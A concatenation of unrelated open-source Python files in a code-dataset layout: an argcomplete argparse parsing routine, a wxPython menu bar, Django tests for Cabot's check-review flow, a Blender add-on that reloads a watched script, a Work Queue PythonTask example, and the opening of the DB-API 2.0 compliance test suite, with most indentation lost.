conflicts.extend(group_actions[:i])
conflicts.extend(group_actions[i + 1:])
# find all option indices, and determine the arg_string_pattern
# which has an 'O' if there is an option at an index,
# an 'A' if there is an argument, or a '-' if there is a '--'
option_string_indices = {}
arg_string_pattern_parts = []
arg_strings_iter = iter(arg_strings)
for i, arg_string in enumerate(arg_strings_iter):
# all args after -- are non-options
if arg_string == '--':
arg_string_pattern_parts.append('-')
for arg_string in arg_strings_iter:
arg_string_pattern_parts.append('A')
# otherwise, add the arg to the arg strings
# and note the index if it was an option
else:
option_tuple = self._parse_optional(arg_string)
if option_tuple is None:
pattern = 'A'
else:
option_string_indices[i] = option_tuple
pattern = 'O'
arg_string_pattern_parts.append(pattern)
# join the pieces together to form the pattern
arg_strings_pattern = ''.join(arg_string_pattern_parts)
# converts arg strings to the appropriate and then takes the action
seen_actions = set()
seen_non_default_actions = set()
self._seen_non_default_actions = seen_non_default_actions # Added by argcomplete
def take_action(action, argument_strings, option_string=None):
seen_actions.add(action)
argument_values = self._get_values(action, argument_strings)
# error if this argument is not allowed with other previously
# seen arguments, assuming that actions that use the default
# value don't really count as "present"
if argument_values is not action.default:
seen_non_default_actions.add(action)
for conflict_action in action_conflicts.get(action, []):
if conflict_action in seen_non_default_actions:
msg = _('not allowed with argument %s')
action_name = _get_action_name(conflict_action)
raise ArgumentError(action, msg % action_name)
# take the action if we didn't receive a SUPPRESS value
# (e.g. from a default)
if argument_values is not SUPPRESS \
or isinstance(action, _SubParsersAction):
try:
action(self, namespace, argument_values, option_string)
except:
# Begin added by argcomplete
# When a subparser action is taken and fails due to incomplete arguments, it does not merge the
# contents of its parsed namespace into the parent namespace. Do that here to allow completers to
# access the partially parsed arguments for the subparser.
if isinstance(action, _SubParsersAction):
subnamespace = action._name_parser_map[argument_values[0]]._argcomplete_namespace
for key, value in vars(subnamespace).items():
setattr(namespace, key, value)
# End added by argcomplete
raise
# function to convert arg_strings into an optional action
def consume_optional(start_index):
# get the optional identified at this index
option_tuple = option_string_indices[start_index]
action, option_string, explicit_arg = option_tuple
# identify additional optionals in the same arg string
# (e.g. -xyz is the same as -x -y -z if no args are required)
match_argument = self._match_argument
action_tuples = []
while True:
# if we found no optional action, skip it
if action is None:
extras.append(arg_strings[start_index])
return start_index + 1
# if there is an explicit argument, try to match the
# optional's string arguments to only this
if explicit_arg is not None:
arg_count = match_argument(action, 'A')
# if the action is a single-dash option and takes no
# arguments, try to parse more single-dash options out
# of the tail of the option string
chars = self.prefix_chars
if arg_count == 0 and option_string[1] not in chars:
action_tuples.append((action, [], option_string))
char = option_string[0]
option_string = char + explicit_arg[0]
new_explicit_arg = explicit_arg[1:] or None
optionals_map = self._option_string_actions
if option_string in optionals_map:
action = optionals_map[option_string]
explicit_arg = new_explicit_arg
else:
msg = _('ignored explicit argument %r')
raise ArgumentError(action, msg % explicit_arg)
                    # if the action expects exactly one argument, we've
# successfully matched the option; exit the loop
elif arg_count == 1:
stop = start_index + 1
args = [explicit_arg]
action_tuples.append((action, args, option_string))
break
# error if a double-dash option did not use the
# explicit argument
else:
msg = _('ignored explicit argument %r')
raise ArgumentError(action, msg % explicit_arg)
# if there is no explicit argument, try to match the
# optional's string arguments with the following strings
# if successful, exit the loop
else:
start = start_index + 1
selected_patterns = arg_strings_pattern[start:]
self.active_actions = [action] # Added by argcomplete
_num_consumed_args[action] = 0 # Added by argcomplete
arg_count = match_argument(action, selected_patterns)
stop = start + arg_count
args = arg_strings[start:stop]
# Begin added by argcomplete
# If the pattern is not open (e.g. no + at the end), remove the action from active actions (since
# it wouldn't be able to consume any more args)
_num_consumed_args[action] = len(args)
if not action_is_open(action):
self.active_actions.remove(action)
# End added by argcomplete
action_tuples.append((action, args, option_string))
break
# add the Optional to the list and return the index at which
# the Optional's string args stopped
assert action_tuples
for action, args, option_string in action_tuples:
take_action(action, args, option_string)
return stop
# the list of Positionals left to be parsed; this is modified
# by consume_positionals()
positionals = self._get_positional_actions()
# function to convert arg_strings into positional actions
def consume_positionals(start_index):
# match as many Positionals as possible
match_partial = self._match_arguments_partial
selected_pattern = arg_strings_pattern[start_index:]
arg_counts = match_partial(positionals, selected_pattern)
# slice off the appropriate arg strings for each Positional
# and add the Positional and its args to the list
for action, arg_count in zip(positionals, arg_counts): # Added by argcomplete
self.active_actions.append(action) # Added by argcomplete
for action, arg_count in zip(positionals, arg_counts):
args = arg_strings[start_index: start_index + arg_count]
start_index += arg_count
_num_consumed_args[action] = len(args) # Added by argcomplete
take_action(action, args)
# slice off the Positionals that we just parsed and return the
# index at which the Positionals' string args stopped
positionals[:] = positionals[len(arg_counts):]
return start_index
# consume Positionals and Optionals alternately, until we have
# passed the last option string
extras = []
start_index = 0
if option_string_indices:
max_option_string_index = max(option_string_indices)
else:
max_option_string_index = -1
while start_index <= max_option_string_index:
# consume any Positionals preceding the next option
next_option_string_index = min([
index
for index in option_string_indices
if index >= start_index])
if start_index != next_option_string_index:
positionals_end_index = consume_positionals(start_index)
# only try to parse the next optional if we didn't consume
# the option string during the positionals parsing
if positionals_end_index > start_index:
start_index = positionals_end_index
continue
else:
start_index = positionals_end_index
# if we consumed all the positionals we could and we're not
# at the index of an option string, there were extra arguments
if start_index not in option_string_indices:
strings = arg_strings[start_index:next_option_string_index]
extras.extend(strings)
start_index = next_option_string_index
# consume the next optional and any arguments for it
start_index = consume_optional(start_index)
# consume any positionals following the last Optional
stop_index = consume_positionals(start_index)
# if we didn't consume all the argument strings, there were extras
extras.extend(arg_strings[stop_index:])
# if we didn't use all the Positional objects, there were too few
# arg strings supplied.
if positionals:
self.active_actions.append(positionals[0]) # Added by argcomplete
self.error(_('too few arguments'))
# make sure all required actions were present
for action in self._actions:
if action.required:
if action not in seen_actions:
name = _get_action_name(action)
self.error(_('argument %s is required') % name)
# make sure all required groups had one option present
for group in self._mutually_exclusive_groups:
if group.required:
for action in group._group_actions:
if action in seen_non_default_actions:
break
# if no actions were used, report the error
else:
names = [_get_action_name(action)
for action in group._group_actions
if action.help is not SUPPRESS]
msg = _('one of the arguments %s is required')
self.error(msg % ' '.join(names))
# return the updated namespace and the extra arguments
return namespace, extras
|
catapult-project/catapult
|
third_party/gsutil/third_party/argcomplete/argcomplete/my_argparse.py
|
Python
|
bsd-3-clause
| 15,351 | 0.000912 |
import wx
from ui.custom_checkbox import CustomCheckBox
class CustomMenuBar(wx.Panel):
def __init__(self, parent, *args, **kwargs):
wx.Panel.__init__(self, parent, *args, **kwargs)
self.parent = parent
self.SetBackgroundColour(self.parent.GetBackgroundColour())
self.SetForegroundColour(self.parent.GetForegroundColour())
self.SetFont(self.parent.GetFont())
self.img_size = 12
self._dragPos = None
self.Bind(wx.EVT_MOTION, self.OnMouse)
gbSizer = wx.GridBagSizer()
self.txtTitle = wx.StaticText(self, wx.ID_ANY, u"Tera DPS ", wx.DefaultPosition, wx.DefaultSize, 0)
gbSizer.Add(self.txtTitle, wx.GBPosition(0, 0), wx.GBSpan(1, 1), wx.ALL, 5)
self.txtServer = wx.StaticText(self, wx.ID_ANY, u"", wx.DefaultPosition, wx.DefaultSize, 0)
gbSizer.Add(self.txtServer, wx.GBPosition(0, 1), wx.GBSpan(1, 1), wx.ALL | wx.ALIGN_CENTER_HORIZONTAL , 5)
self.btn_pin = CustomCheckBox(self, 'ui.pin', color_checked='#FF0000', color_hover='#1188FF')
self.btn_pin.Bind(wx.EVT_CHECKBOX, self.parent.TogglePin)
gbSizer.Add(self.btn_pin, wx.GBPosition(0, 2), wx.GBSpan(1, 1), wx.ALL, 6)
self.btn_config = CustomCheckBox(self, 'ui.settings', color_checked='#FF0000', color_hover='#1188FF')
self.btn_config.Bind(wx.EVT_CHECKBOX, self.parent.ToggleConfig)
gbSizer.Add(self.btn_config, wx.GBPosition(0, 3), wx.GBSpan(1, 1), wx.ALL, 6)
self.btn_close = CustomCheckBox(self, 'ui.close', color_hover='#1188FF')
self.btn_close.Bind(wx.EVT_CHECKBOX, self.parent.OnClose)
gbSizer.Add(self.btn_close, wx.GBPosition(0, 4), wx.GBSpan(1, 1), wx.ALL, 6)
self.line1 = wx.StaticLine(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_HORIZONTAL)
gbSizer.Add(self.line1, wx.GBPosition(1, 0), wx.GBSpan(1, 5), wx.EXPAND | wx.ALL, 0)
gbSizer.AddGrowableCol(1)
self.SetSizer(gbSizer)
def OnMouse(self, event):
if not event.Dragging():
if self._dragPos:
self.ReleaseMouse()
x , y = self.parent.GetPosition()
self.parent.config.WriteInt('x', x)
self.parent.config.WriteInt('y', y)
self._dragPos = None
return
if not self._dragPos:
self.CaptureMouse()
self._dragPos = event.GetPosition()
else:
pos = event.GetPosition()
displacement = self._dragPos - pos
self.parent.SetPosition(self.parent.GetPosition() - displacement)
|
jeff-alves/Tera
|
ui/custom_menu_bar.py
|
Python
|
mit
| 2,593 | 0.00617 |
from urlparse import urlparse
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.test import TestCase
from cabot.cabotapp.models import Service
from cabot.metricsapp.models import MetricsSourceBase, ElasticsearchStatusCheck, GrafanaInstance, GrafanaPanel
class TestMetricsReviewChanges(TestCase):
def setUp(self):
self.user = User.objects.create_user('user', email='user@example.com', password='password')
self.source = MetricsSourceBase.objects.create(name='source')
self.grafana_instance = GrafanaInstance.objects.create(
name='test',
url='http://test.url',
api_key='88888'
)
self.grafana_panel = GrafanaPanel.objects.create(
panel_id=1,
panel_url='http://test.url/some-dashboard/1',
grafana_instance=self.grafana_instance
)
self.metrics_check = ElasticsearchStatusCheck.objects.create(
name='test',
created_by=self.user,
source=self.source,
check_type='<=',
warning_value=9.0,
high_alert_value=15.0,
retries=0,
time_range=30,
frequency=5,
queries='{}',
grafana_panel=self.grafana_panel,
runbook=''
)
self.base_check_data = {
'name': 'test',
'queries': '{}',
'active': True,
'auto_sync': True,
'check_type': '<=',
'warning_value': 9.0,
'high_alert_importance': Service.ERROR_STATUS,
'high_alert_value': 15.0,
'consecutive_failures': 1,
'time_range': 30,
'retries': 0,
'frequency': 5,
'ignore_final_data_point': True,
'on_empty_series': 'fill_zero',
'use_activity_counter': False,
'run_delay': 0,
'run_window': '',
'runbook': '',
}
def test_review_changes(self):
data = self.base_check_data.copy()
data['name'] = 'ultra cool test'
response = self.client.post(reverse('grafana-es-update', kwargs={'pk': self.metrics_check.pk}), data=data)
self.assertNotContains(response, "No changes were made.", status_code=200, msg_prefix=str(response))
self.assertNotContains(response, "errorlist", status_code=200, msg_prefix=str(response))
# DB should NOT be updated yet
self.metrics_check = ElasticsearchStatusCheck.objects.get(pk=self.metrics_check.pk)
self.assertEqual(self.metrics_check.name, 'test')
# now accept the changes by manually setting skip_review to True (which should be done in the response)
# (would ideally do this by using a browser's normal submit routine on the response,
# but I don't think we can do that with just django's standard testing functions.
# we at least scan the HTML for the skip_review input to make sure it got set to True)
self.assertContains(response,
'<input id="skip_review" name="skip_review" type="checkbox" checked="checked" />',
status_code=200)
data['skip_review'] = True
response = self.client.post(reverse('grafana-es-update', kwargs={'pk': self.metrics_check.pk}), data=data)
# verify that we ended up at the success url (/check/<pk>)
self.assertEqual(urlparse(response.url).path, reverse('check', kwargs={'pk': self.metrics_check.pk}))
# DB should be updated, verify the name changed
self.metrics_check = ElasticsearchStatusCheck.objects.get(pk=self.metrics_check.pk)
self.assertEqual(self.metrics_check.name, 'ultra cool test')
def test_review_changes_no_changes(self):
"""
check that if we submit the form with no changes, we still go through the review changes flow
"""
# no changes to the check
data = self.base_check_data.copy()
response = self.client.post(reverse('grafana-es-update', kwargs={'pk': self.metrics_check.pk}), data=data)
self.assertNotContains(response, "errorlist", status_code=200, msg_prefix=str(response))
self.assertContains(response, "No changes were made.", status_code=200, msg_prefix=str(response))
# submitting again (with skip_review=True) should take us back to the check page
data['skip_review'] = True
response = self.client.post(reverse('grafana-es-update', kwargs={'pk': self.metrics_check.pk}), data=data)
# verify that we ended up at the success url (/check/<pk>)
self.assertEqual(urlparse(response.url).path, reverse('check', kwargs={'pk': self.metrics_check.pk}))
|
Affirm/cabot
|
cabot/metricsapp/tests/test_views.py
|
Python
|
mit
| 4,754 | 0.004417 |
"""
script_watcher.py: Reload watched script upon changes.
Copyright (C) 2015 Isaac Weaver
Author: Isaac Weaver <wisaac407@gmail.com>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""
bl_info = {
"name": "Script Watcher",
"author": "Isaac Weaver",
"version": (0, 5),
"blender": (2, 75, 0),
"location": "Properties > Scene > Script Watcher",
"description": "Reloads an external script on edits.",
"warning": "Still in beta stage.",
"wiki_url": "http://wiki.blender.org/index.php/Extensions:2.6/Py/Scripts/Development/Script_Watcher",
"tracker_url": "https://github.com/wisaac407/blender-script-watcher/issues/new",
"category": "Development",
}
import os, sys
import io
import traceback
import types
import bpy
from bpy.app.handlers import persistent
@persistent
def load_handler(dummy):
try:
if (bpy.context.scene.sw_settings.running and bpy.context.scene.sw_settings.auto_watch_on_startup):
bpy.ops.wm.sw_watch_end('EXEC_DEFAULT')
bpy.ops.wm.sw_watch_start('EXEC_DEFAULT')
else:
bpy.ops.wm.sw_watch_end('EXEC_DEFAULT')
except:
print("Exception on startup check!")
def add_scrollback(ctx, text, text_type):
for line in text:
bpy.ops.console.scrollback_append(ctx, text=line.replace('\t', ' '),
type=text_type)
class SplitIO(io.StringIO):
"""Feed the input stream into another stream."""
PREFIX = '[Script Watcher]: '
_can_prefix = True
def __init__(self, stream):
io.StringIO.__init__(self)
self.stream = stream
def write(self, s):
# Make sure we prefix our string before we do anything else with it.
if self._can_prefix:
s = self.PREFIX + s
        # Only prefix the next write if this one ended with a newline.
self._can_prefix = s.endswith('\n')
# Make sure to call the super classes write method.
io.StringIO.write(self, s)
# When we are written to, we also write to the secondary stream.
self.stream.write(s)
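# Hypothetical usage sketch for SplitIO (not how the add-on wires it up, just
# an illustration of the teeing behaviour): writes go to the real stream while
# a prefixed copy stays available for later inspection.
def _split_io_example():
    tee = SplitIO(sys.stdout)
    tee.write('hello\n')   # echoed to stdout with the '[Script Watcher]: ' prefix
    tee.seek(0)
    return tee.read()      # the captured, prefixed text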
# Define the script watching operator.
class WatchScriptOperator(bpy.types.Operator):
"""Watches the script for changes, reloads the script if any changes occur."""
bl_idname = "wm.sw_watch_start"
bl_label = "Watch Script"
_timer = None
_running = False
_times = None
filepath = None
def get_paths(self):
"""Find all the python paths surrounding the given filepath."""
dirname = os.path.dirname(self.filepath)
paths = []
filepaths = []
for root, dirs, files in os.walk(dirname, topdown=True):
if '__init__.py' in files:
paths.append(root)
for f in files:
filepaths.append(os.path.join(root, f))
else:
dirs[:] = [] # No __init__ so we stop walking this dir.
# If we just have one (non __init__) file then return just that file.
return paths, filepaths or [self.filepath]
    def get_mod_name(self):
        """Return the module name and the root path of the given python file path."""
dir, mod = os.path.split(self.filepath)
# Module is a package.
if mod == '__init__.py':
mod = os.path.basename(dir)
dir = os.path.dirname(dir)
# Module is a single file.
else:
mod = os.path.splitext(mod)[0]
return mod, dir
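    # Hypothetical illustration of get_mod_name(): for a package entry point
    # such as '/addons/my_tool/__init__.py' it returns ('my_tool', '/addons'),
    # while for a single file such as '/scripts/tool.py' it returns
    # ('tool', '/scripts'). The paths here are placeholders.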
def remove_cached_mods(self):
"""Remove all the script modules from the system cache."""
paths, files = self.get_paths()
for mod_name, mod in list(sys.modules.items()):
if hasattr(mod, '__file__') and os.path.dirname(mod.__file__) in paths:
del sys.modules[mod_name]
def _reload_script_module(self):
print('Reloading script:', self.filepath)
self.remove_cached_mods()
try:
f = open(self.filepath)
paths, files = self.get_paths()
# Get the module name and the root module path.
mod_name, mod_root = self.get_mod_name()
# Create the module and setup the basic properties.
mod = types.ModuleType('__main__')
mod.__file__ = self.filepath
mod.__path__ = paths
mod.__package__ = mod_name
# Add the module to the system module cache.
sys.modules[mod_name] = mod
            # Finally, execute the module.
exec(compile(f.read(), self.filepath, 'exec'), mod.__dict__)
except IOError:
print('Could not open script file.')
except:
sys.stderr.write("There was an error when running the script:\n" + traceback.format_exc())
else:
f.close()
def reload_script(self, context):
"""Reload this script while printing the output to blenders python console."""
# Setup stdout and stderr.
stdout = SplitIO(sys.stdout)
stderr = SplitIO(sys.stderr)
sys.stdout = stdout
sys.stderr = stderr
# Run the script.
self._reload_script_module()
        # Go back to the beginning so we can read the streams.
stdout.seek(0)
stderr.seek(0)
# Don't use readlines because that leaves trailing new lines.
output = stdout.read().split('\n')
output_err = stderr.read().split('\n')
if self.use_py_console:
# Print the output to the consoles.
for area in context.screen.areas:
if area.type == "CONSOLE":
ctx = context.copy()
ctx.update({"area": area})
# Actually print the output.
if output:
add_scrollback(ctx, output, 'OUTPUT')
if output_err:
add_scrollback(ctx, output_err, 'ERROR')
# Cleanup
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
def modal(self, context, event):
if not context.scene.sw_settings.running:
self.cancel(context)
return {'CANCELLED'}
if context.scene.sw_settings.reload:
context.scene.sw_settings.reload = False
self.reload_script(context)
return {'PASS_THROUGH'}
if event.type == 'TIMER':
for path in self._times:
cur_time = os.stat(path).st_mtime
if cur_time != self._times[path]:
self._times[path] = cur_time
self.reload_script(context)
return {'PASS_THROUGH'}
def execute(self, context):
if context.scene.sw_settings.running:
return {'CANCELLED'}
# Grab the settings and store them as local variables.
self.filepath = bpy.path.abspath(context.scene.sw_settings.filepath)
self.use_py_console = context.scene.sw_settings.use_py_console
        # If it's not a file, doesn't exist, or permission is denied, we don't proceed.
if not os.path.isfile(self.filepath):
self.report({'ERROR'}, 'Unable to open script.')
return {'CANCELLED'}
# Setup the times dict to keep track of when all the files where last edited.
dirs, files = self.get_paths()
self._times = dict((path, os.stat(path).st_mtime) for path in files) # Where we store the times of all the paths.
self._times[files[0]] = 0 # We set one of the times to 0 so the script will be loaded on startup.
# Setup the event timer.
wm = context.window_manager
self._timer = wm.event_timer_add(0.1, context.window)
wm.modal_handler_add(self)
context.scene.sw_settings.running = True
return {'RUNNING_MODAL'}
def cancel(self, context):
wm = context.window_manager
wm.event_timer_remove(self._timer)
self.remove_cached_mods()
context.scene.sw_settings.running = False
class CancelScriptWatcher(bpy.types.Operator):
"""Stop watching the current script."""
bl_idname = "wm.sw_watch_end"
bl_label = "Stop Watching"
def execute(self, context):
# Setting the running flag to false will cause the modal to cancel itself.
context.scene.sw_settings.running = False
return {'FINISHED'}
class ReloadScriptWatcher(bpy.types.Operator):
"""Reload the current script."""
bl_idname = "wm.sw_reload"
bl_label = "Reload Script"
def execute(self, context):
# Setting the reload flag to true will cause the modal to cancel itself.
context.scene.sw_settings.reload = True
return {'FINISHED'}
# Create the UI for the operator. NEEDS FINISHING!!
class ScriptWatcherPanel(bpy.types.Panel):
"""UI for the script watcher."""
bl_label = "Script Watcher"
bl_idname = "SCENE_PT_script_watcher"
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "scene"
def draw(self, context):
layout = self.layout
running = context.scene.sw_settings.running
col = layout.column()
col.prop(context.scene.sw_settings, 'filepath')
col.prop(context.scene.sw_settings, 'use_py_console')
col.prop(context.scene.sw_settings, 'auto_watch_on_startup')
col.operator('wm.sw_watch_start', icon='VISIBLE_IPO_ON')
col.enabled = not running
if running:
row = layout.row(align=True)
row.operator('wm.sw_watch_end', icon='CANCEL')
row.operator('wm.sw_reload', icon='FILE_REFRESH')
class ScriptWatcherSettings(bpy.types.PropertyGroup):
"""All the script watcher settings."""
running = bpy.props.BoolProperty(default=False)
reload = bpy.props.BoolProperty(default=False)
filepath = bpy.props.StringProperty(
name = 'Script',
description = 'Script file to watch for changes.',
subtype = 'FILE_PATH'
)
use_py_console = bpy.props.BoolProperty(
name = 'Use py console',
        description = 'Use the built-in Blender Python console for program output (e.g. print statements and error messages)',
default = False
)
auto_watch_on_startup = bpy.props.BoolProperty(
name = 'Watch on startup',
description = 'Watch script automatically on new .blend load',
default = False
)
def register():
bpy.utils.register_class(WatchScriptOperator)
bpy.utils.register_class(ScriptWatcherPanel)
bpy.utils.register_class(CancelScriptWatcher)
bpy.utils.register_class(ReloadScriptWatcher)
bpy.utils.register_class(ScriptWatcherSettings)
bpy.types.Scene.sw_settings = \
bpy.props.PointerProperty(type=ScriptWatcherSettings)
bpy.app.handlers.load_post.append(load_handler)
def unregister():
bpy.utils.unregister_class(WatchScriptOperator)
bpy.utils.unregister_class(ScriptWatcherPanel)
bpy.utils.unregister_class(CancelScriptWatcher)
bpy.utils.unregister_class(ReloadScriptWatcher)
bpy.utils.unregister_class(ScriptWatcherSettings)
bpy.app.handlers.load_post.remove(load_handler)
del bpy.types.Scene.sw_settings
if __name__ == "__main__":
register()
|
kilbee/blender-script-watcher
|
script_watcher.py
|
Python
|
gpl-2.0
| 12,299 | 0.007887 |
#!/usr/bin/env python3
# copyright (C) 2021- The University of Notre Dame
# This software is distributed under the GNU General Public License.
# See the file COPYING for details.
# Example on how to execute python code with a Work Queue task.
# The class PythonTask allows users to execute python functions as Work Queue
# commands. Functions and their arguments are pickled to a file and executed
# utilizing a wrapper script to execut the function. the output of the executed
# function is then written to a file as an output file and read when neccesary
# allowing the user to get the result as a python variable during runtime and
# manipulated later.
# A PythonTask object is created as `p_task = PyTask.PyTask(func, args)` where
# `func` is the name of the function and args are the arguments needed to
# execute the function. PythonTask can be submitted to a queue as regular Work
# Queue functions, such as `q.submit(p_task)`.
#
# When a task has completed, the resulting python value can be retrieved by
# reading the output attribute, such as: `x = t.output` where t is the task returned by
# `t = q.wait()`.
#
# By default, the task will run assuming that the worker is executing inside an
# appropiate python environment. If this is not the case, an environment file
# can be specified with: `t.specify_environment("env.tar.gz")`, in which
# env.tar.gz is created with the conda-pack module, and has at least a python
# installation, the dill module, and the conda module.
#
# A minimal conda environment 'my-minimal-env.tar.gz' can be created with:
#
# conda create -y -p my-minimal-env python=3.8 dill conda
# conda install -y -p my-minimal-env -c conda-forge conda-pack
# conda install -y -p my-minimal-env pip and conda install other modules, etc.
# conda run -p my-minimal-env conda-pack
import work_queue as wq
def divide(dividend, divisor):
import math
return dividend/math.sqrt(divisor)
def main():
q = wq.WorkQueue(9123)
for i in range(1, 16):
p_task = wq.PythonTask(divide, 1, i**2)
# if python environment is missing at worker...
#p_task.specify_environment("env.tar.gz")
q.submit(p_task)
sum = 0
while not q.empty():
t = q.wait(5)
if t:
x = t.output
if isinstance(x, wq.PythonTaskNoResult):
print("Task {} failed and did not generate a result.".format(t.id))
else:
sum += x
print(sum)
if __name__ == '__main__':
main()
|
btovar/cctools
|
work_queue/src/bindings/python3/PythonTask_example.py
|
Python
|
gpl-2.0
| 2,499 | 0.002001 |
#!/usr/bin/env python
''' Python DB API 2.0 driver compliance unit test suite.
This software is Public Domain and may be used without restrictions.
"Now we have booze and barflies entering the discussion, plus rumours of
DBAs on drugs... and I won't tell you what flashes through my mind each
time I read the subject line with 'Anal Compliance' in it. All around
this is turning out to be a thoroughly unwholesome unit test."
-- Ian Bicking
'''
__rcs_id__ = '$Id: dbapi20.py,v 1.10 2003/10/09 03:14:14 zenzen Exp $'
__version__ = '$Revision: 1.10 $'[11:-2]
__author__ = 'Stuart Bishop <zen@shangri-la.dropbear.id.au>'
import unittest
import time
# $Log: dbapi20.py,v $
# Revision 1.10 2003/10/09 03:14:14 zenzen
# Add test for DB API 2.0 optional extension, where database exceptions
# are exposed as attributes on the Connection object.
#
# Revision 1.9 2003/08/13 01:16:36 zenzen
# Minor tweak from Stefan Fleiter
#
# Revision 1.8 2003/04/10 00:13:25 zenzen
# Changes, as per suggestions by M.-A. Lemburg
# - Add a table prefix, to ensure namespace collisions can always be avoided
#
# Revision 1.7 2003/02/26 23:33:37 zenzen
# Break out DDL into helper functions, as per request by David Rushby
#
# Revision 1.6 2003/02/21 03:04:33 zenzen
# Stuff from Henrik Ekelund:
# added test_None
# added test_nextset & hooks
#
# Revision 1.5 2003/02/17 22:08:43 zenzen
# Implement suggestions and code from Henrik Eklund - test that cursor.arraysize
# defaults to 1 & generic cursor.callproc test added
#
# Revision 1.4 2003/02/15 00:16:33 zenzen
# Changes, as per suggestions and bug reports by M.-A. Lemburg,
# Matthew T. Kromer, Federico Di Gregorio and Daniel Dittmar
# - Class renamed
# - Now a subclass of TestCase, to avoid requiring the driver stub
# to use multiple inheritance
# - Reversed the polarity of buggy test in test_description
# - Test exception heirarchy correctly
# - self.populate is now self._populate(), so if a driver stub
# overrides self.ddl1 this change propogates
# - VARCHAR columns now have a width, which will hopefully make the
# DDL even more portible (this will be reversed if it causes more problems)
# - cursor.rowcount being checked after various execute and fetchXXX methods
# - Check for fetchall and fetchmany returning empty lists after results
# are exhausted (already checking for empty lists if select retrieved
# nothing
# - Fix bugs in test_setoutputsize_basic and test_setinputsizes
#
class DatabaseAPI20Test(unittest.TestCase):
''' Test a database self.driver for DB API 2.0 compatibility.
This implementation tests Gadfly, but the TestCase
is structured so that other self.drivers can subclass this
        test case to ensure compliance with the DB-API. It is
expected that this TestCase may be expanded in the future
if ambiguities or edge conditions are discovered.
The 'Optional Extensions' are not yet being tested.
self.drivers should subclass this test, overriding setUp, tearDown,
self.driver, connect_args and connect_kw_args. Class specification
should be as follows:
import dbapi20
class mytest(dbapi20.DatabaseAPI20Test):
[...]
Don't 'import DatabaseAPI20Test from dbapi20', or you will
confuse the unit tester - just 'import dbapi20'.
'''
# The self.driver module. This should be the module where the 'connect'
# method is to be found
driver = None
connect_args = () # List of arguments to pass to connect
connect_kw_args = {} # Keyword arguments for connect
table_prefix = 'dbapi20test_' # If you need to specify a prefix for tables
ddl1 = 'create table %sbooze (name varchar(20))' % table_prefix
ddl2 = 'create table %sbarflys (name varchar(20))' % table_prefix
xddl1 = 'drop table %sbooze' % table_prefix
xddl2 = 'drop table %sbarflys' % table_prefix
lowerfunc = 'lower' # Name of stored procedure to convert string->lowercase
# Some drivers may need to override these helpers, for example adding
# a 'commit' after the execute.
def executeDDL1(self,cursor):
cursor.execute(self.ddl1)
def executeDDL2(self,cursor):
cursor.execute(self.ddl2)
def setUp(self):
''' self.drivers should override this method to perform required setup
if any is necessary, such as creating the database.
'''
pass
def tearDown(self):
''' self.drivers should override this method to perform required cleanup
if any is necessary, such as deleting the test database.
The default drops the tables that may be created.
'''
con = self._connect()
try:
cur = con.cursor()
for ddl in (self.xddl1,self.xddl2):
try:
cur.execute(ddl)
con.commit()
except self.driver.Error:
# Assume table didn't exist. Other tests will check if
# execute is busted.
pass
finally:
con.close()
def _connect(self):
try:
return self.driver.connect(
*self.connect_args,**self.connect_kw_args
)
except AttributeError:
self.fail("No connect method found in self.driver module")
def test_connect(self):
con = self._connect()
con.close()
def test_apilevel(self):
try:
# Must exist
apilevel = self.driver.apilevel
# Must equal 2.0
self.assertEqual(apilevel,'2.0')
except AttributeError:
self.fail("Driver doesn't define apilevel")
def test_threadsafety(self):
try:
# Must exist
threadsafety = self.driver.threadsafety
# Must be a valid value
self.failUnless(threadsafety in (0,1,2,3))
except AttributeError:
self.fail("Driver doesn't define threadsafety")
def test_paramstyle(self):
try:
# Must exist
paramstyle = self.driver.paramstyle
# Must be a valid value
self.failUnless(paramstyle in (
'qmark','numeric','named','format','pyformat'
))
except AttributeError:
self.fail("Driver doesn't define paramstyle")
def test_Exceptions(self):
# Make sure required exceptions exist, and are in the
        # defined hierarchy.
self.failUnless(issubclass(self.driver.Warning,Exception))
self.failUnless(issubclass(self.driver.Error,Exception))
self.failUnless(
issubclass(self.driver.InterfaceError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.DatabaseError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.OperationalError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.IntegrityError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.InternalError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.ProgrammingError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.NotSupportedError,self.driver.Error)
)
def test_ExceptionsAsConnectionAttributes(self):
# OPTIONAL EXTENSION
# Test for the optional DB API 2.0 extension, where the exceptions
# are exposed as attributes on the Connection object
# I figure this optional extension will be implemented by any
# driver author who is using this test suite, so it is enabled
# by default.
con = self._connect()
drv = self.driver
self.failUnless(con.Warning is drv.Warning)
self.failUnless(con.Error is drv.Error)
self.failUnless(con.InterfaceError is drv.InterfaceError)
self.failUnless(con.DatabaseError is drv.DatabaseError)
self.failUnless(con.OperationalError is drv.OperationalError)
self.failUnless(con.IntegrityError is drv.IntegrityError)
self.failUnless(con.InternalError is drv.InternalError)
self.failUnless(con.ProgrammingError is drv.ProgrammingError)
self.failUnless(con.NotSupportedError is drv.NotSupportedError)
def test_commit(self):
con = self._connect()
try:
# Commit must work, even if it doesn't do anything
con.commit()
finally:
con.close()
def test_rollback(self):
con = self._connect()
# If rollback is defined, it should either work or throw
# the documented exception
if hasattr(con,'rollback'):
try:
con.rollback()
except self.driver.NotSupportedError:
pass
def test_cursor(self):
con = self._connect()
try:
cur = con.cursor()
finally:
con.close()
def test_cursor_isolation(self):
con = self._connect()
try:
# Make sure cursors created from the same connection have
# the documented transaction isolation level
cur1 = con.cursor()
cur2 = con.cursor()
self.executeDDL1(cur1)
cur1.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
cur2.execute("select name from %sbooze" % self.table_prefix)
booze = cur2.fetchall()
